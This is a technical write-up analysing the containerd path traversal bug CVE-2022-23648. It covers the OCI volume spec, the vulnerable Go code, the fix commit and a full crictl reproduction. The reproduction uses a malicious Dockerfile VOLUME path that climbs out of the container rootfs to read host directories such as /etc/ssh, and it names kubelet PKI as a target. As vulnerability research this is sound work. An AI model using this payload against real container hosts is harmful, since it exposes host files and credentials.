Path traversal is a classic class of security bug. Because it is a logic error, it keeps appearing in software no matter how quickly the technology evolves. This post analyzes a path traversal issue in containerd, CVE-2022-23648, discovered by Felix Wilhelm. The first part explains the relevant spec, so that we know what the feature is supposed to do and how the implementation violates it.
Containers have the concept of a volume. Without a volume, any data changed inside a container disappears once the container is destroyed. Volumes exist to persist data or to share it between containers. A volume is often (if not always) implemented with a bind mount. In docker, the -v option adds a volume.
root@ubuntu:/home/test/CVE-2022-23648# mkdir test
root@ubuntu:/home/test/CVE-2022-23648# echo "data in host" > test/aaa
root@ubuntu:/home/test/CVE-2022-23648# docker run -it --rm -v /home/test/CVE-2022-23648/test:/test ubuntu bash
root@c201b6a39be2:/# mount | grep test
/dev/sda5 on /test type ext4 (rw,relatime,errors=remount-ro)
root@ecc59c1f5bc4:/# ls /test/
aaa
root@ecc59c1f5bc4:/# cat /test/aaa
data in host
root@ecc59c1f5bc4:/# echo "data in guest" >> /test/aaa
root@ecc59c1f5bc4:/# exit
exit
root@ubuntu:/home/test/CVE-2022-23648# cat test/aaa
data in host
data in guest
Running ‘docker inspect containerid’ on the host shows the volume under “Mounts”.
"Mounts": [
{
"Type": "bind",
"Source": "/home/test/CVE-2022-23648/test",
"Destination": "/test",
"Mode": "",
"RW": true,
"Propagation": "rprivate"
}
],
The OCI image spec also has a field named ‘Volumes’. The definition says it is ‘A set of directories describing where the process is likely to write data specific to a container instance’.
Let’s try to test this feature. First create a Dockerfile.
from ubuntu:20.04
VOLUME /volume-test/
Build it and start a container. We can see there is a mount in the container.
root@ubuntu:/home/test/CVE-2022-23648# docker build -t volume-test .
Sending build context to Docker daemon 3.584kB
Step 1/2 : from ubuntu:20.04
---> ff0fea8310f3
Step 2/2 : VOLUME /volume-test/
---> Running in 2b744c0f90ff
Removing intermediate container 2b744c0f90ff
---> 1cf01e39ec82
Successfully built 1cf01e39ec82
Successfully tagged volume-test:latest
root@ubuntu:/home/test/CVE-2022-23648# docker run -it --rm volume-test bash
root@a301238d982c:/# ls -lh /volume-test/
total 0
root@a301238d982c:/# mount | grep volume
/dev/sda5 on /volume-test type ext4 (rw,relatime,errors=remount-ro)
‘docker inspect’ shows the following mount information.
"Mounts": [
{
"Type": "volume",
"Name": "e05d07c283a443133ba5635dfe13d2241a68087e96c47e5521febe9f7eb5bd98",
"Source": "/var/lib/docker/volumes/e05d07c283a443133ba5635dfe13d2241a68087e96c47e5521febe9f7eb5bd98/_data",
"Destination": "/volume-test",
"Driver": "local",
"Mode": "",
"RW": true,
"Propagation": ""
}
],
‘docker image inspect’ shows the following:
"Volumes": {
"/volume-test/": {}
},
As we can see, the ‘Source’ is generated by the runtime itself and the ‘Destination’ is the path given to VOLUME.
As Felix points out, when this configuration is converted into an OCI runtime configuration, containerd tries to follow the spec at https://github.com/opencontainers/image-spec/blob/main/conversion.md, which says:
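To make the shape of this field concrete, here is a minimal Go sketch that decodes the ‘Volumes’ object shown above and lists its destinations. The ‘imageConfig’ struct and the ‘volumeDestinations’ helper are hypothetical, trimmed-down stand-ins written for this example; they are not the real image-spec types. The point is only that ‘Volumes’ is a set of paths (a map with empty values), and each key is a string the image author fully controls.

```go
package main

import (
	"encoding/json"
	"fmt"
	"sort"
)

// imageConfig mirrors only the "Volumes" field of an image configuration.
// It is a hypothetical, trimmed-down type used to keep this example
// self-contained.
type imageConfig struct {
	Volumes map[string]struct{} `json:"Volumes"`
}

// volumeDestinations returns the sorted keys of the Volumes set. Each key
// is the destination path that a runtime is expected to mount.
func volumeDestinations(raw []byte) ([]string, error) {
	var cfg imageConfig
	if err := json.Unmarshal(raw, &cfg); err != nil {
		return nil, err
	}
	dsts := make([]string, 0, len(cfg.Volumes))
	for dst := range cfg.Volumes {
		dsts = append(dsts, dst)
	}
	sort.Strings(dsts)
	return dsts, nil
}

func main() {
	// Same content as the "docker image inspect" output above.
	raw := []byte(`{"Volumes": {"/volume-test/": {}}}`)
	dsts, err := volumeDestinations(raw)
	if err != nil {
		panic(err)
	}
	fmt.Println(dsts) // prints [/volume-test/]
}
```

Nothing in this format restricts what the keys look like, so any validation has to happen in the runtime that consumes them.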
“Implementations SHOULD provide mounts for these locations such that application data is not written to the container’s root filesystem. If a converter implements conversion for this field using mountpoints, it SHOULD set the destination of the mountpoint to the value specified in Config.Volumes. An implementation MAY seed the contents of the mount with data in the image at the same location”
The key phrase is ‘seed the contents of the mount with data in the image at the same location’. It means that if the image already has data in the volume directory, the implementation may populate the new mount with that data. Let’s check this with docker.
root@ubuntu:/home/test/CVE-2022-23648# cat Dockerfile
from ubuntu:20.04
RUN mkdir /volume-test
RUN echo "volume data" > /volume-test/aaa
VOLUME /volume-test/
root@ubuntu:/home/test/CVE-2022-23648# docker build -t volume-test1 .
Sending build context to Docker daemon 3.584kB
Step 1/4 : from ubuntu:20.04
---> ff0fea8310f3
Step 2/4 : RUN mkdir /volume-test
---> Using cache
---> a05c3161c55d
Step 3/4 : RUN echo "volume data" > /volume-test/aaa
---> Running in 60702a1547f5
Removing intermediate container 60702a1547f5
---> 4702775454c2
Step 4/4 : VOLUME /volume-test/
---> Running in 14963733faf9
Removing intermediate container 14963733faf9
---> cc3e2700af76
Successfully built cc3e2700af76
Successfully tagged volume-test1:latest
root@ubuntu:/home/test/CVE-2022-23648# docker run -it --rm volume-test1 bash
root@20939034b463:/# mount | grep volume
/dev/sda5 on /volume-test type ext4 (rw,relatime,errors=remount-ro)
root@20939034b463:/# ls /volume-test/
aaa
root@20939034b463:/# cat /volume-test/aaa
volume data
As we can see, the original data is in the volume. This is what ‘seeding’ the data means. If we investigate further, we find three paths named ‘aaa’ on the host.
root@ubuntu:/home/test# find /var/lib/ -name aaa
/var/lib/docker/volumes/ed8dac626f22fe409ff7159aeb1cc59d90f506876ca655fd5896f007bbbfed36/_data/aaa
/var/lib/docker/overlay2/50c147cecab7d2310c82188c95f3e5711c4e8c096488ba275e143f21afe05123/diff/volume-test/aaa
/var/lib/docker/overlay2/45535f60b70e7185f78837ccac706cb03f3efcb7e0b01dd409aa1d314d8f857c/merged/volume-test/aaa
The first is the copy in the volume. The second and third are the same file from the container image: one in the image layer (‘diff’) and one seen through the container’s overlay view (‘merged’). The first file was copied from the image’s ‘/volume-test’ directory.
Now we know how ‘VOLUME’ travels from the OCI image configuration to the OCI runtime configuration. To seed the data, the converter needs to copy the data from the original image into the container’s mount directory.
The vulnerability is in containerd’s seeding step. Say we set VOLUME to “/../../../../../../../../var/lib/kubelet/pki/”; the copy then becomes:
copy /var/lib/docker/overlay2/xxx/merged//../../../../../../../../var/lib/kubelet/pki/ /var/lib/docker/volumes/yyy/_data/
containerd tries to copy files from the image into the volume, but it does not validate the source path, and that path is controlled by the OCI image configuration.
The ‘volumeMounts’ function in ‘cri/server/container_create.go’ creates mounts from ‘Volumes’.
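The effect of joining a rootfs path with such a VOLUME value can be checked with the Go standard library alone. In the sketch below, ‘copySource’ is a hypothetical name for the path computation; the rootfs path is the placeholder used above, and the outputs assume a Linux host.

```go
package main

import (
	"fmt"
	"path/filepath"
)

// copySource shows how a seeding source path is computed when the rootfs
// path and the image-supplied volume path are simply joined. The function
// name is hypothetical.
func copySource(rootfs, volume string) string {
	// filepath.Join also calls filepath.Clean, which resolves ".."
	// lexically and can therefore climb out of rootfs.
	return filepath.Join(rootfs, volume)
}

func main() {
	rootfs := "/var/lib/docker/overlay2/xxx/merged"

	// A benign volume stays inside the rootfs.
	fmt.Println(copySource(rootfs, "/volume-test/"))
	// prints /var/lib/docker/overlay2/xxx/merged/volume-test

	// A malicious volume escapes to the host path.
	fmt.Println(copySource(rootfs, "/../../../../../../../../var/lib/kubelet/pki/"))
	// prints /var/lib/kubelet/pki
}
```

The number of ‘..’ components only has to be at least the depth of the rootfs directory; extra ones are dropped once the path reaches ‘/’.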
func (c *criService) volumeMounts(containerRootDir string, criMounts []*runtime.Mount, config *imagespec.ImageConfig) []*runtime.Mount {
	...
	var mounts []*runtime.Mount
	for dst := range config.Volumes {
		...
		volumeID := util.GenerateID()
		src := filepath.Join(containerRootDir, "volumes", volumeID)
		// addOCIBindMounts will create these volumes.
		mounts = append(mounts, &runtime.Mount{
			ContainerPath:  dst,
			HostPath:       src,
			SelinuxRelabel: true,
		})
	}
	return mounts
}
The ‘ContainerPath’ comes straight from the image configuration, so it can be the malicious path.
Later, in the code that consumes these mounts, the ‘HostPath’ is cleaned but the ‘ContainerPath’ is not.
if len(volumeMounts) > 0 {
	mountMap := make(map[string]string)
	for _, v := range volumeMounts {
		mountMap[filepath.Clean(v.HostPath)] = v.ContainerPath
	}
	opts = append(opts, customopts.WithVolumes(mountMap))
}
Finally, ‘WithVolumes’ in ‘pkg/cri/opts/container.go’ performs the copy.
for host, volume := range volumeMounts {
	// The volume may have been defined with a C: prefix, which we can't use here.
	volume = strings.TrimPrefix(volume, "C:")
	for _, mountPath := range mountPaths {
		src := filepath.Join(mountPath, volume)
		if _, err := os.Stat(src); err != nil {
			if os.IsNotExist(err) {
				// Skip copying directory if it does not exist.
				continue
			}
			return fmt.Errorf("stat volume in rootfs: %w", err)
		}
		if err := copyExistingContents(src, host); err != nil {
			return fmt.Errorf("taking runtime copy of volume: %w", err)
		}
	}
}
Here ‘mountPath’ is a host directory holding part of the container rootfs, ‘volume’ is the malicious path, and ‘host’ is the host directory that will be mounted into the container. The ‘src’ argument of ‘copyExistingContents’ looks like ‘/xxx/xx/../../../../../../../../../etc’, which ‘filepath.Join’ collapses to ‘/etc’ on the host filesystem. So ‘copyExistingContents’ copies host data into the volume, where the container can read it.
The fix is in this commit.
@@ -112,7 +112,10 @@ func WithVolumes(volumeMounts map[string]string) containerd.NewContainerOpts {
 			// The volume may have been defined with a C: prefix, which we can't use here.
 			volume = strings.TrimPrefix(volume, "C:")
 			for _, mountPath := range mountPaths {
-				src := filepath.Join(mountPath, volume)
+				src, err := fs.RootPath(mountPath, volume)
+				if err != nil {
+					return fmt.Errorf("rootpath on mountPath %s, volume %s: %w", mountPath, volume, err)
+				}
 				if _, err := os.Stat(src); err != nil {
 					if os.IsNotExist(err) {
 						// Skip copying directory if it does not exist.
The fix simply replaces ‘filepath.Join’ with ‘fs.RootPath’, which evaluates the path, including any symlinks in ‘volume’, and keeps the result bounded to the root directory.
The vulnerability itself is easy to understand, but I failed to reproduce it with docker or ctr. Fu Wei, a containerd maintainer, told me to use crictl instead, because the vulnerable code ships in containerd’s CRI plugin. This part is mostly about setting up the crictl environment. Along the way I asked Bonan and Fu Wei many questions, thanks! The setup mostly follows this post.
Download v1.23.0 from the cri-tools release page.
root@ubuntu:/home/test# tar -xzvf crictl-v1.23.0-linux-amd64.tar.gz -C /usr/bin
crictl
root@ubuntu:/home/test# crictl --version
crictl version v1.23.0
Create /etc/crictl.yaml with the following configuration.
runtime-endpoint: unix:///var/run/containerd/containerd.sock
image-endpoint: unix:///var/run/containerd/containerd.sock
timeout: 10
debug: false
Create the containerd config file /etc/containerd/config.toml
root@ubuntu:/home/test# mkdir /etc/containerd
root@ubuntu:/home/test# vi /etc/containerd/config.toml
root@ubuntu:/home/test# systemctl restart containerd
root@ubuntu:/home/test# cat /etc/containerd/config.toml
[plugins]
  [plugins.cri]
    sandbox_image = "rancher/pause:3.1"
    [plugins.cri.cni]
      bin_dir = "/opt/cni/bin"
      conf_dir = "/etc/cni/net.d"
    [plugins.cri.registry]
      [plugins.cri.registry.mirrors]
        [plugins.cri.registry.mirrors."docker.io"]
          endpoint = ["https://docker.mirrors.ustc.edu.cn"]
  [plugins.linux]
    shim = "containerd-shim"
    runtime = "runc"
    runtime_root = ""
    no_shim = false
    shim_debug = false
Install the CNI plugins. Download them from the CNI plugins release page.
root@ubuntu:/home/test# mkdir -p /opt/cni/bin
root@ubuntu:/home/test# tar -zxvf cni-plugins-linux-amd64-v1.1.1.tgz -C /opt/cni/bin
./
./macvlan
./static
./vlan
./portmap
./host-local
./vrf
./bridge
./tuning
./firewall
./host-device
./sbr
./loopback
./dhcp
./ptp
./ipvlan
./bandwidth
root@ubuntu:/home/test# vi /etc/cni/net.d/10-mynet.conf
root@ubuntu:/home/test# vi /etc/cni/net.d/99-loopback.conf
root@ubuntu:/home/test# cat /etc/cni/net.d/10-mynet.conf
{
    "cniVersion": "0.2.0",
    "name": "mynet",
    "type": "bridge",
    "bridge": "cni0",
    "isGateway": true,
    "ipMasq": true,
    "ipam": {
        "type": "host-local",
        "subnet": "10.22.0.0/16",
        "routes": [
            { "dst": "0.0.0.0/0" }
        ]
    }
}
root@ubuntu:/home/test# cat /etc/cni/net.d/99-loopback.conf
{
    "cniVersion": "0.2.0",
    "name": "lo",
    "type": "loopback"
}
Pull the pause image
root@ubuntu:/home/test# crictl pull registry.aliyuncs.com/google_containers/pause:3.6
Image is up to date for sha256:6270bb605e12e581514ada5fd5b3216f727db55dc87d5889c790e4c760683fee
root@ubuntu:/home/test# crictl image
IMAGE TAG IMAGE ID SIZE
registry.aliyuncs.com/google_containers/pause 3.6 6270bb605e12e 302kB
root@ubuntu:/home/test# ctr -n k8s.io image tag registry.aliyuncs.com/google_containers/pause:3.6 k8s.gcr.io/pause:3.6
k8s.gcr.io/pause:3.6
root@ubuntu:/home/test# crictl image
IMAGE TAG IMAGE ID SIZE
k8s.gcr.io/pause 3.6 6270bb605e12e 302kB
registry.aliyuncs.com/google_containers/pause 3.6 6270bb605e12e 302kB
Create the malicious image. First put a marker file on the host, then write the Dockerfile and build it.
root@ubuntu:/home/test/CVE-2022-23648# echo "host" > /etc/ssh/host_file
root@ubuntu:/home/test/CVE-2022-23648# vi Dockerfile
root@ubuntu:/home/test/CVE-2022-23648# docker build -t cve-2022-23648 .
Sending build context to Docker daemon 3.584kB
Step 1/2 : from ubuntu:20.04
---> ff0fea8310f3
Step 2/2 : VOLUME /../../../../../../../../etc/ssh
---> Running in 06720320c1f6
Removing intermediate container 06720320c1f6
---> b253bcd6793c
Successfully built b253bcd6793c
Successfully tagged cve-2022-23648:latest
root@ubuntu:/home/test/CVE-2022-23648# cat Dockerfile
from ubuntu:20.04
VOLUME /../../../../../../../../etc/ssh
root@ubuntu:/home/test/CVE-2022-23648#
Import it into containerd.
root@ubuntu:/home/test/CVE-2022-23648# docker save cve-2022-23648 > cve-2022-23648.tar
root@ubuntu:/home/test/CVE-2022-23648# ctr -n k8s.io image import cve-2022-23648.tar
unpacking docker.io/library/cve-2022-23648:latest (sha256:6280c4ac2a16fb85d1c15d4c43055a32ce226c04bbdb0358c8f0b39d93aa869a)...done
root@ubuntu:/home/test/CVE-2022-23648# crictl image
IMAGE TAG IMAGE ID SIZE
docker.io/library/cve-2022-23648 latest b253bcd6793c2 75.1MB
k8s.gcr.io/pause 3.6 6270bb605e12e 302kB
registry.aliyuncs.com/google_containers/pause 3.6 6270bb605e12e 302kB
Run the malicious image
root@ubuntu:/home/test/CVE-2022-23648# crictl run --no-pull container-config.json pod-config.json
ba2d0c46c5502c2b9bd7027333c3779095d5e297ef165bfe50b863a0fb82d8c2
root@ubuntu:/home/test/CVE-2022-23648# crictl pods
POD ID CREATED STATE NAME NAMESPACE ATTEMPT RUNTIME
3bf95742d0fb3 10 seconds ago Ready test default 1 (default)
root@ubuntu:/home/test/CVE-2022-23648# crictl ps
CONTAINER IMAGE CREATED STATE NAME ATTEMPT POD ID
ba2d0c46c5502 docker.io/library/cve-2022-23648:latest 14 seconds ago Running test 0 3bf95742d0fb3
root@ubuntu:/home/test/CVE-2022-23648# crictl exec -it ba2d0c46c5502 bash
root@ubuntu:/# ls /etc/ssh/
root@ubuntu:/# ls /etc/ssh
Hmm, no host data. What’s wrong? Checking this page, it turns out my containerd version already contains the fix.
root@ubuntu:/home/test# containerd --version
containerd github.com/containerd/containerd 1.5.5-0ubuntu3~20.04.2
root@ubuntu:/home/test# which containerd
/usr/bin/containerd
root@ubuntu:/home/test# stat /usr/bin/containerd
File: /usr/bin/containerd
Size: 60305392 Blocks: 117784 IO Block: 4096 regular file
Device: 805h/2053d Inode: 5769129 Links: 1
Access: (0755/-rwxr-xr-x) Uid: ( 0/ root) Gid: ( 0/ root)
Access: 2022-03-25 23:43:13.235999616 -0700
Modify: 2022-02-25 12:15:25.000000000 -0800
Change: 2022-03-14 06:37:43.871583849 -0700
Birth: -
So install an older, vulnerable version and try again.
root@ubuntu:/home/test/CVE-2022-23648# crictl stopp 3bf95742d0fb3
Stopped sandbox 3bf95742d0fb3
root@ubuntu:/home/test/CVE-2022-23648# crictl rmp 3bf95742d0fb3
Removed sandbox 3bf95742d0fb3
root@ubuntu:/home/test/CVE-2022-23648# crictl pods
POD ID CREATED STATE NAME NAMESPACE ATTEMPT RUNTIME
root@ubuntu:/home/test/CVE-2022-23648# crictl ps
CONTAINER IMAGE CREATED STATE NAME ATTEMPT POD ID
root@ubuntu:/home/test/CVE-2022-23648# crictl run --no-pull container-config.json pod-config.json
fe4ef77ab8e31434ab73e952c69710634a2cc2ec4a2f072cac45436941e7cc6b
root@ubuntu:/home/test/CVE-2022-23648# crictl pods
POD ID CREATED STATE NAME NAMESPACE ATTEMPT RUNTIME
1ecc6bee60024 4 seconds ago Ready test default 1 (default)
root@ubuntu:/home/test/CVE-2022-23648# crictl ps
CONTAINER IMAGE CREATED STATE NAME ATTEMPT POD ID
fe4ef77ab8e31 docker.io/library/cve-2022-23648:latest 7 seconds ago Running test 0 1ecc6bee60024
root@ubuntu:/home/test/CVE-2022-23648# crictl exec -it fe4ef77ab8e31 bash
root@ubuntu:/# ls /etc/ssh
host_file ssh_config ssh_config.d
root@ubuntu:/# cat /etc/ssh/host_file
host
root@ubuntu:/# exit
exit
root@ubuntu:/home/test/CVE-2022-23648# containerd --version
containerd github.com/containerd/containerd 1.3.3-0ubuntu2
Finally, the vulnerability is reproduced.
After reproducing the vulnerability, I wanted to know why docker and ctr did not trigger it, and discussed this at length with Fu Wei. Here are my conclusions (I am not sure they are 100% accurate):
CRI is the interface between Kubernetes and the container runtime. OCI is the spec for how to run a container. So some software has to sit between CRI and OCI: it implements the CRI interface for Kubernetes, converts each CRI request into a low-level OCI spec, and launches the container. containerd and cri-o are software of this kind. Kubernetes can also use docker to run containers, but that requires dockershim to speak CRI.
Since the vulnerability is in containerd’s CRI plugin, it can only be triggered through the CRI path. In this post I used crictl to trigger it. It can also be triggered from Kubernetes when containerd is the CRI runtime.